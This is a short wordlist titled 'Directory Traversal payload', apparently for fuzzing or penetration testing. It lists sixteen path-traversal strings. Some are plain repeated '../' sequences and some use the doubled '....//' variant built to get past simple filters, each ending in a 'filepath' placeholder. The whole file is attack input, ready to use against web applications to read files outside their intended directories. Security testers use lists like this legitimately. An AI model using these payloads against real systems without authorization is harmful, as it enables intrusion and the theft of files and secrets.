# Directory Traversal payload

..filepath
../..filepath
../../..filepath
../../../..filepath
../../../../..filepath
../../../../../..filepath
../../../../../../..filepath
../../../../../../../..filepath
..../filepath
....//..../filepath
....//....//..../filepath
....//....//....//..../filepath
....//....//....//....//..../filepath
....//....//....//....//....//..../filepath
....//....//....//....//....//....//..../filepath
....//....//....//....//....//....//....//..../filepath
